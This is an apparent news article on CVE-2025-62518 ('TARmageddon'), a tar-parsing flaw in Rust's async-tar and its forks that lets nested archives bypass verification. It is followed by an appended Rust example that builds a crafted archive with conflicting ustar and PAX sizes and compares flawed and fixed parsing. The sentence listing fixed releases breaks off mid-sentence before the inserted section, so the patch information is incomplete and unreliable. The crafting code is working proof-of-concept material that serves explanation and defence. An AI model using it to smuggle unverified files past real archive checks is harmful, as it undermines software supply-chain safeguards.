Rust TAR Libraries Flaw Allows Nested Archive Extraction

A vulnerability (CVE-2025-62518, codenamed TARmageddon) has been identified in the async-tar library, written in Rust, that allows files to be extracted not only from a specially crafted tar archive but also from a tar archive nested inside it. It can be exploited to bypass archive verification systems and unpack unverified files. The root cause is that the parser picks the wrong one of two size values when it computes where the next entry begins: an entry's size can be given both in its ustar header and in a PAX extended header, and the two can be made to disagree.

The vulnerability also affects forks of async-tar, such as tokio-tar, krata-tokio-tar and astral-tokio-tar, and tools built on them such as the package manager uv, created as a high-performance alternative to pip for Python projects. Other popular projects that use the vulnerable libraries include the testcontainers toolkit for running Docker containers and the WebAssembly runtime wasmCloud; the affected crates have substantial download counts on crates.io.

To carry out an attack, one crafts a TAR archive in which an entry's ustar header specifies a size of zero while the accompanying PAX extended header carries the real size. The parser reads the zero size when advancing to the next entry and therefore does not skip over the entry's content, so the file's data, which is itself another tar archive, is parsed as further entries of the outer archive. Sample code for crafting such archives has been published on GitHub. The vulnerability has been fixed in the releases of tokio-tar 0.5.6 and
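The following is an added example, not code from async-tar, its forks or the published proof of concept. It models the mechanism described above with a minimal tar reader written against the standard library only: it constructs (inline, as sample data) an outer archive whose PAX header says the `data.tar` entry is 2048 bytes while the ustar header says 0 bytes, then lists the archive twice, once advancing by the ustar size (the flawed behaviour) and once by the PAX size (the fixed behaviour). The entry and file names, and the single-record PAX layout, are assumptions chosen for the illustration; the real library's code path is more involved and is not reproduced here.

```rust
// Added example: simplified model of the ustar/PAX size desynchronisation.
// Not the async-tar or tokio-tar implementation; the archive is constructed inline.

const BLOCK: usize = 512;

/// Round a byte length up to a whole number of 512-byte blocks.
fn pad(len: usize) -> usize {
    (len + BLOCK - 1) / BLOCK * BLOCK
}

/// Build a 512-byte ustar header. `size` is whatever the ustar size field should claim.
fn ustar_header(name: &str, size: usize, typeflag: u8) -> [u8; BLOCK] {
    let mut h = [0u8; BLOCK];
    h[..name.len()].copy_from_slice(name.as_bytes());
    h[100..107].copy_from_slice(b"0000644"); // mode
    h[108..115].copy_from_slice(b"0000000"); // uid
    h[116..123].copy_from_slice(b"0000000"); // gid
    h[124..135].copy_from_slice(format!("{:011o}", size).as_bytes()); // size, octal
    h[136..147].copy_from_slice(b"00000000000"); // mtime
    h[156] = typeflag;
    h[257..263].copy_from_slice(b"ustar\0");
    h[263..265].copy_from_slice(b"00");
    // Checksum is the byte sum of the header with the checksum field itself read as spaces.
    h[148..156].copy_from_slice(b"        ");
    let sum: u32 = h.iter().map(|&b| b as u32).sum();
    h[148..155].copy_from_slice(format!("{:06o}\0", sum).as_bytes());
    h[155] = b' ';
    h
}

/// Build a PAX extended header entry (typeflag 'x') carrying a single "size" record.
/// Each PAX record is "<len> <key>=<value>\n" where <len> counts the whole record.
fn pax_size_header(size: usize) -> Vec<u8> {
    let body = format!("size={}\n", size);
    let mut n = body.len() + 2;
    while n.to_string().len() + 1 + body.len() != n {
        n += 1;
    }
    let record = format!("{} {}", n, body);
    let mut out = ustar_header("PaxHeaders/data.tar", record.len(), b'x').to_vec();
    out.extend_from_slice(record.as_bytes());
    out.resize(BLOCK + pad(record.len()), 0);
    out
}

/// Parse an octal ustar numeric field (NUL- or space-terminated).
fn parse_size(field: &[u8]) -> usize {
    let s: String = field.iter().take_while(|&&b| b != 0 && b != b' ').map(|&b| b as char).collect();
    usize::from_str_radix(&s, 8).unwrap_or(0)
}

/// Extract the "size" override from PAX extended-header content, if present.
fn parse_pax_size(content: &[u8]) -> Option<usize> {
    let text = String::from_utf8_lossy(content);
    for rec in text.split('\n') {
        if let Some((_len, kv)) = rec.split_once(' ') {
            if let Some(v) = kv.strip_prefix("size=") {
                return v.trim_end_matches('\0').parse().ok();
            }
        }
    }
    None
}

/// Walk an archive and return the entry names it yields. With `trust_pax_for_offset`
/// false the reader advances by the ustar size field even when a PAX header overrode
/// it (the flaw); with it true the PAX size is used consistently (the fix).
fn list_entries(archive: &[u8], trust_pax_for_offset: bool) -> Vec<String> {
    let mut names = Vec::new();
    let mut pos = 0;
    let mut pax_size: Option<usize> = None;
    while pos + BLOCK <= archive.len() {
        let hdr = &archive[pos..pos + BLOCK];
        if hdr.iter().all(|&b| b == 0) {
            break; // zero block marks end of archive
        }
        let ustar_size = parse_size(&hdr[124..136]);
        if hdr[156] == b'x' {
            let end = (pos + BLOCK + ustar_size).min(archive.len());
            pax_size = parse_pax_size(&archive[pos + BLOCK..end]);
            pos += BLOCK + pad(ustar_size);
            continue;
        }
        let name: String = hdr[..100].iter().take_while(|&&b| b != 0).map(|&b| b as char).collect();
        names.push(name);
        let effective = pax_size.take().unwrap_or(ustar_size);
        let skip = if trust_pax_for_offset { effective } else { ustar_size };
        pos += BLOCK + pad(skip);
    }
    names
}

/// Construct the crafted outer archive: the PAX header states the true size of the
/// `data.tar` entry, the ustar header claims 0, and the entry body is itself a tar archive.
fn build_crafted_archive() -> Vec<u8> {
    let payload = b"nested payload"; // constructed sample content
    let mut inner = ustar_header("inner.txt", payload.len(), b'0').to_vec();
    inner.extend_from_slice(payload);
    inner.resize(pad(inner.len()), 0);
    inner.resize(inner.len() + 2 * BLOCK, 0); // inner archive's end-of-archive blocks

    let mut outer = pax_size_header(inner.len());
    outer.extend_from_slice(&ustar_header("data.tar", 0, b'0')); // the lie: size 0
    outer.extend_from_slice(&inner);
    outer.resize(outer.len() + 2 * BLOCK, 0);
    outer
}

fn main() {
    let archive = build_crafted_archive();
    println!("flawed offset logic sees: {:?}", list_entries(&archive, false));
    println!("fixed offset logic sees:  {:?}", list_entries(&archive, true));
}
```

With the flawed offset logic the reader lands on the nested archive's first header and reports `inner.txt` as an entry of the outer archive; with the PAX size used consistently it skips the whole `data.tar` body and reaches the outer archive's end-of-archive marker. A reader that wants to be conservative can go further than the fix modelled here and reject any entry whose ustar and PAX sizes disagree when both are non-zero.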
